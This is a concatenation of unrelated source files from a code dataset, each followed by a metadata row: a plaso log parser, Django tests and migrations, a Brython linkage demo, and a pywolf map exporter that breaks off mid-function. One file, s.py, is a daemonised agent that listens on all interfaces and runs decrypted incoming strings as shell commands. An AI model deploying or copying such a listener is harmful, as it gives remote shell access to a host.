self.previous_structure = structure
message = structure.message
else:
times = structure.times
structure = self.previous_structure
message = u'Repeated {0:d} times: {1:s}'.format(
times, structure.message)
# It uses CarsNotIn structure which leaves whitespaces
# at the beginning of the sender and the caller.
sender = structure.sender.strip()
caller = structure.caller.strip()
if not caller:
caller = 'unknown'
if not structure.security_api:
security_api = u'unknown'
else:
security_api = structure.security_api
return MacSecuritydLogEvent(
timestamp, structure, sender, structure.sender_pid, security_api,
caller, message)
def _GetTimestamp(self, day, month, year, time):
"""Gets a timestamp from a pyparsing ParseResults timestamp.
This is a timestamp_string as returned by using
text_parser.PyparsingConstants structures:
08, Nov, [20, 36, 37]
Args:
day: An integer representing the day.
month: An integer representing the month.
year: An integer representing the year.
time: A list containing the hours, minutes, seconds.
Returns:
timestamp: A plaso timestamp.
"""
hours, minutes, seconds = time
return timelib.Timestamp.FromTimeParts(
year, month, day, hours, minutes, seconds)
def _GetYear(self, stat, zone):
"""Retrieves the year either from the input file or from the settings."""
time = getattr(stat, 'crtime', 0)
if not time:
time = getattr(stat, 'ctime', 0)
if not time:
current_year = timelib.GetCurrentYear()
logging.error((
u'Unable to determine year of log file.\nDefaulting to: '
u'{0:d}').format(current_year))
return current_year
try:
timestamp = datetime.datetime.fromtimestamp(time, zone)
except ValueError:
current_year = timelib.GetCurrentYear()
logging.error((
u'Unable to determine year of log file.\nDefaulting to: '
u'{0:d}').format(current_year))
return current_year
return timestamp.year
manager.ParsersManager.RegisterParser(MacSecuritydLogParser)
| apache-2.0 | 7,085,151,202,668,476,000 | 33.300725 | 80 | 0.680046 | false |
selboo/starl-mangle | Agent/Server/s.py | 1 | 4397 | #!/usr/bin/env python
#_*_encoding:utf-8_*_
# encoding:utf-8
import socket, os, subprocess, sys
import time,select,threading
import rsa,base64
import l_command
PRIVATE = os.getcwd()+"/private.pem"
def exchengx_text(text):
Result_Text = []
for i in range(len(text)):
Result_Text.append(''.join(text[i]))
Result_Text = ''.join(Result_Text)
return Result_Text
def key():
return 'Selboo'
def decryption(crypto):
with open(PRIVATE) as privatefile:
p = privatefile.read()
privkey = rsa.PrivateKey.load_pkcs1(p)
try:
message = rsa.decrypt(crypto, privkey)
except rsa.pkcs1.DecryptionError, e:
message = False
print 'ID-002 DecryptionError...:%s' % e
return message
def tcpsocket():
try:
name = 'selboo'
listen_ip = '0.0.0.0'
socket_port = '54321'
buffer_size = '1024'
listen_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_tcp.bind((listen_ip, int(socket_port)))
listen_tcp.setblocking(0)
listen_tcp.listen(100)
except socket.error, e:
print 'ID-001 Create Socket Error...:%s' % e
os._exit(0)
def tcp_send(connection, content):
tcp_limit = 100
tcp_length = len(content)
tcp_subcon = tcp_length / tcp_limit
tcp_tail = tcp_length % tcp_limit
tcp_start = 0
tcp_stop = tcp_limit
tcp_head = str(tcp_length)+','+str(tcp_subcon)+'|'+name
tcp_head = tcp_head.ljust(tcp_limit)
connection.send(tcp_head)
if tcp_length <= tcp_limit:
connection.send(content[tcp_start:tcp_length])
return 0
alist = []
for i in range(0,tcp_subcon):
tcp_d = content[tcp_start:tcp_stop]
connection.send(tcp_d)
time.sleep(0.0001)
tcp_start = tcp_stop
tcp_stop = tcp_stop + tcp_limit
tcp_t = content[tcp_start:tcp_length]
connection.send(tcp_t)
return 0
def command(tag, connection, reault):
if tag == 1:
Reault_exchangx = exchengx_text(reault)
#connection.send(base64.encodestring(Reault_exchangx))
#print Reault_exchangx
tcp_send(connection, Reault_exchangx)
return 0
else:
tcp_send(connection, reault)
return 0
return 1
def tcmd(Test, listen_tcp):
connection,address = listen_tcp.accept()
buf_src = connection.recv(int(buffer_size))
if decryption(buf_src):
buf = decryption(buf_src)
else:
buf_src = 'Decryption failed '+buf_src
connection.send(buf_src)
return 0
if buf == 'l_restart':
reload(l_command)
command(2, connection, str('Restart...'))
return 0
cmd = l_command.l_main(buf)
if cmd:
command(2, connection, str(cmd))
return 0
if len(buf) != 0:
p = subprocess.Popen(str(buf), shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
Result_out = p.stdout.readlines()
if Result_out:
command(1, connection, Result_out)
Result_err = p.stderr.readlines()
if Result_err:
command(1, connection, Result_err)
connection.close()
return 0
while True:
infds,outfds,errfds = select.select([listen_tcp,],[],[],5)
if len(infds) != 0:
ting = threading.Thread(target=tcmd, args=('Test', listen_tcp))
ting.start()
def createDaemon():
try:
if os.fork() > 0:
os._exit(0)
except OSError, error:
print 'fork #1 failed: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
os.chdir('/')
os.setsid()
os.umask(0)
try:
pid = os.fork()
if pid > 0:
#print 'Daemon PID %d' % pid
os._exit(0)
except OSError, error:
print 'fork #2 failed: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
#conn.send(os.getpid())
#conn.close()
funzioneDemo()
def funzioneDemo():
tcpsocket()
if __name__ == '__main__':
createDaemon()
| apache-2.0 | -6,994,118,043,903,329,000 | 27.006369 | 125 | 0.549011 | false |
wiredrive/wtframework | generate_examples.py | 1 | 2872 | ##########################################################################
# This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from __future__ import print_function
import os
from six import u
# This file takes the files in the /tests directory, then converts them
# into strings in wtframework/wtf/_devtools_/filetemplates/examples.py
# These are the files that are generated when the user does --withexamples
# in the project generator
if __name__ == '__main__':
example_path = os.path.join('wtframework', 'wtf', '_devtools_', 'filetemplates', '_examples_.py')
print(example_path)
examples_file = open(example_path,
"w")
examples_file.write(u("""##########################################################################
#This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from six import u
examples = {}
"""))
for root, dirs, files in os.walk('tests'):
for example_file in files:
if not example_file.endswith(".py"):
continue
fpath = os.path.join(root, example_file)
print("processing ", fpath)
the_file = open(fpath)
examples_file.write(u("examples['" + fpath + "'] = u('''"))
examples_file.write(u(the_file.read().replace("'''", '"""')))
examples_file.write(u("\n''')\n\n"))
examples_file.close()
| gpl-3.0 | -365,536,399,557,576,400 | 38.888889 | 103 | 0.587396 | false |
2014c2g5/2014cadp | wsgi/local_data/brython_programs/fourbar1.py | 1 | 1463 | # need yen_fourbar.js
from javascript import JSConstructor
import math
from browser import doc
import browser.timer
# convert Javascript function object into Brython object
point = JSConstructor(Point)
line = JSConstructor(Line)
link = JSConstructor(Link)
triangle = JSConstructor(Triangle)
def draw():
global theta
# clear canvas context
ctx.clearRect(0, 0, canvas.width, canvas.height)
# draw linkeage
line1.drawMe(ctx)
line2.drawMe(ctx)
line3.drawMe(ctx)
# draw triangles
#triangle1.drawMe(ctx)
#triangle2.drawMe(ctx)
# input link rotation increment
theta += dx
# calculate new p2 position according to new theta angle
p2.x = p1.x + line1.length*math.cos(theta*degree)
p2.y = p1.y - line1.length*math.sin(theta*degree)
temp = triangle2.setPPSS(p2, p4, link3_len, link2_len)
p3.x = temp[0]
p3.y = temp[1]
x, y, r = 10, 10, 10
# define canvas and context
canvas = doc["plotarea"]
ctx = canvas.getContext("2d")
# fourbar linkage inputs
theta = 0
degree = math.pi/180
dx = 2
dy = 4
p1 = point(150, 100)
p2 = point(150, 200)
p3 = point(300, 300)
p4 = point(350, 100)
line1 = link(p1, p2)
line2 = link(p2, p3)
line3 = link(p3, p4)
line4 = link(p1, p4)
line5 = link(p2, p4)
link2_len = p2.distance(p3)
link3_len = p3.distance(p4)
triangle1 = triangle(p1,p2,p4)
triangle2 = triangle(p2,p3,p4)
temp = []
ctx.translate(0, canvas.height)
ctx.scale(1, -1)
browser.timer.set_interval(draw, 10) | gpl-3.0 | -3,730,226,384,178,324,500 | 23.813559 | 60 | 0.688312 | false |
wheelcms/wheelcms_users | wheelcms_users/tests/test_userconfig.py | 1 | 3520 | import pytest
import json
from wheelcms_axle.configuration import ConfigurationHandler
from wheelcms_users.models import ConfigurationHandler as UserConfigurationHandler
from django.contrib.auth.models import User
import mock
from twotest.fixtures import client, django_client
@pytest.fixture
def handler():
patch_processors = mock.patch(
'django.template.context.get_standard_processors',
return_value=())
patch_processors.start()
try:
return ConfigurationHandler(request=mock.Mock())
finally:
patch_processors.stop()
class TestUserConfig(object):
def test_nousers(self, handler):
""" No users """
userconf = UserConfigurationHandler()
instance = mock.Mock()
with mock.patch("django.contrib.auth.models.User.objects.all",
return_value=[]):
data = json.loads(userconf.user_data(handler, instance).content)
assert data['existing'] == []
def test_user(self, handler):
""" Single user with some role """
userconf = UserConfigurationHandler()
instance = mock.Mock()
with mock.patch("django.contrib.auth.models.User.objects.all",
return_value=[
mock.Mock(id=1,
username="u", first_name="f",
last_name="l", email="e",
is_active=True, is_superuser=False,
roles=mock.Mock(**{"all.return_value":[
mock.Mock(**{"role.id":123})
]
}
))
]):
data = json.loads(userconf.user_data(handler, instance).content)
assert len(data['existing']) == 1
user = data['existing'][0]
assert user['id'] == 1
assert user['username'] == 'u'
assert user['firstname'] == 'f'
assert user['lastname'] == 'l'
assert user['email'] == 'e'
assert user['active']
assert not user['superuser']
assert user['roles'] == {'123':True}
def test_save_user(self, handler, client):
""" Adding a new user """
userconf = UserConfigurationHandler()
instance = mock.Mock()
handler.request = mock.Mock(**{"method":"POST",
"POST.get.return_value":
json.dumps({ 'existing':[
dict(state="added",
id='added_1',
username="new",
firstname="first",
lastname="last",
email="[email protected]")
]})
}
)
data = json.loads(userconf.user_data(handler, instance).content)
user = User.objects.filter(username="new")
assert user.count() == 1
assert user[0].first_name == "first"
assert user[0].last_name == "last"
assert user[0].email == "[email protected]"
| bsd-2-clause | -53,175,416,013,545,170 | 37.26087 | 82 | 0.451136 | false |
hydroshare/django_docker_processes | migrations/0001_initial.py | 1 | 9489 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import jsonfield.fields
import django_docker_processes.models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ContainerOverrides',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=256)),
('command', models.TextField(null=True, blank=True)),
('working_dir', models.CharField(max_length=65536, null=True, blank=True)),
('user', models.CharField(max_length=65536, null=True, blank=True)),
('entrypoint', models.CharField(max_length=65536, null=True, blank=True)),
('privileged', models.BooleanField(default=False)),
('lxc_conf', models.CharField(max_length=65536, null=True, blank=True)),
('memory_limit', models.IntegerField(default=0, help_text=b'megabytes')),
('cpu_shares', models.IntegerField(help_text=b'CPU Shares', null=True, blank=True)),
('dns', jsonfield.fields.JSONField(help_text=b'JSON list of alternate DNS servers', null=True, blank=True)),
('net', models.CharField(blank=True, max_length=8, null=True, help_text=b'Network settings - leave blank for default behavior', choices=[(b'bridge', b'bridge'), (b'none', b'none'), (b'host', b'host')])),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerEnvVar',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1024)),
('value', models.TextField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerLink',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('link_name', models.CharField(max_length=256)),
('docker_overrides', models.ForeignKey(blank=True, to='django_docker_processes.ContainerOverrides', help_text=b'Overrides for the container to run', null=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerPort',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536)),
('container', models.CharField(max_length=65536)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerProcess',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('container_id', models.CharField(max_length=128, null=True, blank=True)),
('token', models.CharField(default=django_docker_processes.models.docker_process_token, unique=True, max_length=128, db_index=True)),
('logs', models.TextField(null=True, blank=True)),
('finished', models.BooleanField(default=False)),
('error', models.BooleanField(default=False)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerProfile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=1024, db_index=True)),
('git_repository', models.CharField(max_length=16384)),
('git_use_submodules', models.BooleanField(default=False)),
('git_username', models.CharField(max_length=256, null=True, blank=True)),
('git_password', models.CharField(max_length=64, null=True, blank=True)),
('commit_id', models.CharField(max_length=64, null=True, blank=True)),
('branch', models.CharField(default=b'master', max_length=1024, null=True, blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='DockerVolume',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536, null=True, blank=True)),
('container', models.CharField(max_length=65536)),
('readonly', models.BooleanField(default=False)),
('docker_profile', models.ForeignKey(to='django_docker_processes.DockerProfile')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverrideEnvVar',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1024)),
('value', models.TextField()),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverrideLink',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('link_name', models.CharField(max_length=256)),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
('docker_profile_from', models.ForeignKey(help_text=b'This container must be started and running for the target to run', to='django_docker_processes.DockerProfile')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverridePort',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536)),
('container', models.CharField(max_length=65536)),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OverrideVolume',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('host', models.CharField(max_length=65536)),
('container', models.CharField(max_length=65536)),
('container_overrides', models.ForeignKey(to='django_docker_processes.ContainerOverrides')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='dockerprocess',
name='profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerprocess',
name='user',
field=models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True),
preserve_default=True,
),
migrations.AddField(
model_name='dockerport',
name='docker_profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerlink',
name='docker_profile',
field=models.ForeignKey(help_text=b'This is the "target" container. It will receive information about\nthe "from" container as an environment var', to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerlink',
name='docker_profile_from',
field=models.ForeignKey(related_name='profile_link_to', to='django_docker_processes.DockerProfile', help_text=b'This container must be started and running for the target to run'),
preserve_default=True,
),
migrations.AddField(
model_name='dockerenvvar',
name='docker_profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
migrations.AddField(
model_name='containeroverrides',
name='docker_profile',
field=models.ForeignKey(to='django_docker_processes.DockerProfile'),
preserve_default=True,
),
]
| bsd-3-clause | 3,178,048,872,036,171,000 | 45.743842 | 219 | 0.562125 | false |
TexZK/pywolf | bin/export_ql_pk3.py | 1 | 62849 | # TODO: create Exporter class(es)
# TODO: break export loops into single item calls with wrapping loop
# TODO: allow export to normal file, PK3 being an option (like with open(file_object|path))
import argparse
import collections
import io
import logging
import os
import sys
import zipfile
from PIL import Image
import numpy as np
from pywolf.audio import samples_upsample, wave_write, convert_imf_to_wave, convert_wave_to_ogg
import pywolf.game
from pywolf.graphics import write_targa_bgrx, build_color_image
import pywolf.persistence
from pywolf.utils import find_partition, load_as_module
OBJECT_LIGHT_MAP = { # name: (normalized_height, amount, color)
'ceiling_light': (0.8, 100, (1.0, 1.0, 0.9)),
'chandelier': (0.8, 200, (1.0, 1.0, 0.8)),
'lamp': (0.6, 100, (1.0, 1.0, 0.9)),
'chalice': (0.2, 30, (1.0, 1.0, 0.8)),
'cross': (0.2, 30, (1.0, 1.0, 0.8)),
'crown': (0.2, 30, (1.0, 1.0, 0.8)),
'jewels': (0.2, 30, (1.0, 1.0, 0.8)),
'extra_life': (0.3, 30, (0.8, 0.8, 1.0)),
'gold_key': (0.2, 30, (1.0, 1.0, 0.8)),
'medkit': (0.2, 30, (1.0, 1.0, 1.0)),
'silver_key': (0.2, 30, (0.8, 1.0, 1.0)),
}
COLLECTABLE_ENTITY_MAP = { # (name, wait)
'ammo': ('ammo_pack', 10),
'ammo_used': ('ammo_pack', 10),
'chaingun': ('weapon_chaingun', 5),
'chalice': ('item_armor_shard', 25),
'cross': ('item_armor_shard', 25),
'crown': ('item_armor_shard', 25),
'dog_food': ('item_health_small', 35),
'extra_life': ('item_health_mega', 35),
'food': ('item_health', 35),
'gold_key': ('item_haste', 120),
'jewels': ('item_armor_shard', 25),
'machinegun': ('weapon_hmg', 5),
'medkit': ('item_health_large', 35),
'silver_key': ('item_quad', 120),
}
IMF2WAV_PATH = os.path.join('..', 'tools', 'imf2wav')
OGGENC2_PATH = os.path.join('..', 'tools', 'oggenc2')
TEXTURE_SHADER_TEMPLATE = '''
{0!s}
{{
qer_editorimage {1!s}
noMipMaps
{{
map {1!s}
rgbGen identityLighting
}}
}}
'''
SPRITE_SHADER_TEMPLATE = '''
{0!s}
{{
qer_editorimage {1!s}
noMipMaps
deformVertexes autoSprite2
surfaceparm trans
surfaceparm nonsolid
cull none
{{
clampmap {1!s}
alphaFunc GT0
rgbGen identityLighting
}}
}}
'''
NORTH = 0
EAST = 1
SOUTH = 2
WEST = 3
TOP = 4
BOTTOM = 5
DIR_TO_DISPL = [
( 0, -1, 0),
( 1, 0, 0),
( 0, 1, 0),
(-1, 0, 0),
( 0, 0, 1),
( 0, 0, -1),
]
DIR_TO_YAW = [
90,
0,
270,
180,
0,
0,
]
ENEMY_INDEX_TO_DIR = [
EAST,
NORTH,
WEST,
SOUTH,
]
TURN_TO_YAW = [
0,
45,
90,
135,
180,
225,
270,
315,
]
TURN_TO_DISPL = [
( 1, 0),
( 1, -1),
( 0, -1),
( -1, -1),
( -1, 0),
( -1, 1),
( 0, 1),
( 1, 1),
]
def _force_unlink(*paths):
for path in paths:
try:
os.unlink(path)
except:
pass
def build_cuboid_vertices(extreme_a, extreme_b):
xa, ya, za = extreme_a
xb, yb, zb = extreme_b
return [[(xb, yb, zb), (xa, yb, zb), (xa, yb, za), (xb, yb, za)],
[(xb, ya, zb), (xb, yb, zb), (xb, yb, za), (xb, ya, za)],
[(xa, ya, zb), (xb, ya, zb), (xb, ya, za), (xa, ya, za)],
[(xa, yb, zb), (xa, ya, zb), (xa, ya, za), (xa, yb, za)],
[(xa, yb, zb), (xb, yb, zb), (xb, ya, zb), (xa, ya, zb)],
[(xb, yb, za), (xa, yb, za), (xa, ya, za), (xb, ya, za)]]
def describe_cuboid_brush(face_vertices, face_shaders, shader_scales, format_line=None,
flip_directions=(NORTH, WEST), content_flags=None, surface_flags=None):
if format_line is None:
format_line = ('( {0[0]:.0f} {0[1]:.0f} {0[2]:.0f} ) '
'( {1[0]:.0f} {1[1]:.0f} {1[2]:.0f} ) '
'( {2[0]:.0f} {2[1]:.0f} {2[2]:.0f} ) '
'"{3!s}" 0 0 0 {4:f} {5:f} {6:d} {7:d} 0')
if content_flags is None:
content_flags = (0, 0, 0, 0, 0, 0)
if surface_flags is None:
surface_flags = (0, 0, 0, 0, 0, 0)
lines = ['{']
arrays = zip(range(len(face_vertices)), face_shaders, face_vertices, surface_flags, content_flags)
for direction, shader_name, vertices, surface_flags, content_flags in arrays:
scale_u = shader_scales[0]
scale_v = shader_scales[1]
if direction in flip_directions:
scale_u = -scale_u
line = format_line.format(vertices[0], vertices[1], vertices[2],
shader_name, scale_u, scale_v,
content_flags, surface_flags) # TODO: make as arrays?
lines.append(line)
lines.append('}')
return lines
class MapExporter(object): # TODO
def __init__(self, params, cfg, tilemap, episode_index, submap_index):
self.params = params
self.cfg = cfg
self.tilemap = tilemap
self.episode_index = episode_index
self.submap_index = submap_index
episode = cfg.EPISODES[episode_index]
self.tilemap_index = episode[0] + submap_index
dimensions = tilemap.dimensions
half_units = params.tile_units / 2
self.unit_offsets = ((-half_units * dimensions[0]), (half_units * dimensions[1]), 0)
self.tile_partition_cache = {}
self.entity_partition_cache = {}
def tile_to_unit_coords(self, tile_coords):
tile_units = self.params.tile_units
return [
(tile_coords[0] * tile_units),
(tile_coords[1] * -tile_units),
]
def center_units(self, tile_coords, unit_offsets=(0, 0, 0), center_z=False):
units = self.tile_to_unit_coords(tile_coords)
half = self.params.tile_units / 2
return [(unit_offsets[0] + units[0] + half),
(unit_offsets[1] + units[1] + half),
(unit_offsets[2] + (half if center_z else 0))]
def describe_textured_cube(self, tile_coords, face_shaders, unit_offsets=(0, 0, 0)):
center_x, center_y, center_z = self.center_units(tile_coords, unit_offsets, center_z=True)
half = self.params.tile_units / 2
extreme_a = ((center_x - half), (center_y - half), (center_z - half))
extreme_b = ((center_x + half), (center_y + half), (center_z + half))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
shader_scales = [self.params.shader_scale, self.params.shader_scale]
return describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
def describe_textured_sprite(self, tile_coords, face_shader, unit_offsets=(0, 0, 0)):
center_x, center_y, center_z = self.center_units(tile_coords, unit_offsets, center_z=True)
half = self.params.tile_units / 2
extreme_a = ((center_x - half), (center_y - 1), (center_z - half - 1))
extreme_b = ((center_x + half), (center_y + 0), (center_z + half))
face_vertices = build_cuboid_vertices(extreme_a, extreme_b)
face_shaders = [
face_shader,
'common/nodrawnonsolid',
'common/nodrawnonsolid',
'common/nodrawnonsolid',
'common/nodrawnonsolid',
'common/nodrawnonsolid',
]
shader_scales = [self.params.shader_scale, self.params.shader_scale]
return describe_cuboid_brush(face_vertices, face_shaders, shader_scales)
def describe_area_brushes(self, tile_coords): # TODO: support for all floor/ceiling modes of ChaosEdit
params = self.params
cfg = self.cfg
tilemap_index = self.tilemap_index
tile_units = params.tile_units
format_palette_texture = '{}_palette/color_0x{:02x}'.format
lines = []
face_shaders = [
'common/caulk',
'common/caulk',
'common/caulk',
'common/caulk',
'common/caulk',
format_palette_texture(params.short_name, cfg.CEILING_COLORS[tilemap_index]),
]
offsets = list(self.unit_offsets)
offsets[2] += tile_units
lines.extend(self.describe_textured_cube(tile_coords, face_shaders, offsets))
face_shaders = [
'common/caulk',
'common/caulk',
'common/caulk',
'common/caulk',
format_palette_texture(params.short_name, cfg.FLOOR_COLORS[tilemap_index]),
'common/caulk',
]
offsets = list(self.unit_offsets)
offsets[2] -= tile_units
lines.extend(self.describe_textured_cube(tile_coords, face_shaders, offsets))
return lines
def describe_wall_brush(self, tile_coords):
params = self.params
cfg = self.cfg
tilemap = self.tilemap
x, y = tile_coords
tile = tilemap[x, y]
partition_map = cfg.TILE_PARTITION_MAP
pushwall_entity = cfg.ENTITY_PARTITION_MAP['pushwall'][0]
face_shaders = []
for direction, displacement in enumerate(DIR_TO_DISPL[:4]):
facing_coords = ((x + displacement[0]), (y + displacement[1]))
facing = tilemap.get(facing_coords)
if facing is None:
shader = 'common/caulk'
else:
if facing[1] == pushwall_entity:
facing_partition = 'floor'
else:
facing_partition = find_partition(facing[0], partition_map, count_sign=1,
cache=self.tile_partition_cache)
if facing_partition == 'wall':
shader = 'common/caulk'
else:
if facing_partition == 'floor':
texture = tile[0] - partition_map['wall'][0]
elif facing_partition in ('door', 'door_elevator', 'door_silver', 'door_gold'):
texture = partition_map['door_hinge'][0] - partition_map['wall'][0]
else:
raise ValueError((tile_coords, facing_partition))
shader = '{}_wall/{}__{}'.format(params.short_name, cfg.TEXTURE_NAMES[texture], (direction & 1))
face_shaders.append(shader)
face_shaders += ['common/caulk'] * 2
if any(shader != 'common/caulk' for shader in face_shaders):
return self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
else:
return ()
def describe_sprite(self, tile_coords):
params = self.params
cfg = self.cfg
entity = self.tilemap[tile_coords][1]
name = cfg.ENTITY_OBJECT_MAP[entity]
lines = []
if name in cfg.SOLID_OBJECT_NAMES:
face_shaders = ['common/clip'] * 6
lines.extend(self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets))
face_shader = '{}_static/{}'.format(params.short_name, name)
lines.extend(self.describe_textured_sprite(tile_coords, face_shader, self.unit_offsets))
return lines
def describe_collectable(self, tile_coords): # TODO
params = self.params
cfg = self.cfg
entity = self.tilemap[tile_coords][1]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
name = cfg.ENTITY_OBJECT_MAP[entity]
give_name, give_wait = COLLECTABLE_ENTITY_MAP[name]
trigger_begin = [
'{',
'classname trigger_multiple',
'target "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'wait {:f}'.format(give_wait),
]
trigger_end = ['}']
face_shaders = ['common/trigger'] * 6
trigger_brush = self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
speaker_open_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'adlib/{}'.format(cfg.COLLECTABLE_PICKUP_SOUNDS[name])),
'}',
]
underworld_z = center_z + params.underworld_offset
give_entity = [
'{',
'classname target_give',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, underworld_z),
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'target "collectable_{:.0f}_{:.0f}_give"'.format(*tile_coords),
'}',
]
target_entity = [
'{',
'classname {}'.format(give_name),
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, underworld_z),
'targetname "collectable_{:.0f}_{:.0f}_give"'.format(*tile_coords),
'}'
]
delay_entity = [
'{',
'classname target_delay',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'target "collectable_{:.0f}_{:.0f}_respawn"'.format(*tile_coords),
'wait {:f}'.format(give_wait),
'}',
]
speaker_close_entity = [ # TODO
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
'targetname "collectable_{:.0f}_{:.0f}_respawn"'.format(*tile_coords),
'noise "sound/{}/{}"'.format(params.short_name, 'adlib/menu__exit'),
'}',
]
# Door entity
door_begin = [
'{',
'classname func_door',
'targetname "collectable_{:.0f}_{:.0f}_pickup"'.format(*tile_coords),
'angle -2',
'lip 0',
'dmg 0',
'health 0',
'wait {:f}'.format(give_wait),
'speed 32767',
]
door_end = ['}']
# Sprite brush
face_shader = '{}_collectable/{}'.format(params.short_name, name)
door_brush = self.describe_textured_sprite(tile_coords, face_shader, self.unit_offsets)
# Underworld brush
face_shaders = ['common/nodrawnonsolid'] * 6
unit_offsets = list(self.unit_offsets)
unit_offsets[2] += params.underworld_offset
door_underworld_brush = self.describe_textured_cube(tile_coords, face_shaders, unit_offsets)
light = OBJECT_LIGHT_MAP.get(name)
if light:
normalized_height, amount, color = light
origin = (center_x, center_y, (normalized_height * params.tile_units))
light_entity = [
'{',
'classname light',
'origin "{:.0f} {:.0f} {:.0f}"'.format(*origin),
'light "{:d}"'.format(amount),
'color "{:f} {:f} {:f}"'.format(*color),
'}',
]
else:
light_entity = []
return (trigger_begin + trigger_brush + trigger_end +
speaker_open_entity + delay_entity + speaker_close_entity +
give_entity + target_entity + light_entity +
door_begin + door_brush + door_underworld_brush + door_end)
def describe_door(self, tile_coords):
params = self.params
cfg = self.cfg
tile = self.tilemap[tile_coords][0]
_, texture_name, vertical = cfg.DOOR_MAP[tile]
center_x, center_y, center_z = self.center_units(tile_coords, self.unit_offsets, center_z=True)
half = self.params.tile_units / 2
shader_scales = [self.params.shader_scale, self.params.shader_scale]
trigger_begin = [
'{',
'classname trigger_multiple',
'target "door_{:.0f}_{:.0f}_open"'.format(*tile_coords),
'wait {}'.format(params.door_trigger_wait),
]
trigger_end = ['}']
face_shaders = ['common/trigger'] * 6
trigger_brush = self.describe_textured_cube(tile_coords, face_shaders, self.unit_offsets)
speaker_open_entity = [
'{',
'classname target_speaker',
'origin "{:.0f} {:.0f} {:.0f}"'.format(center_x, center_y, center_z),
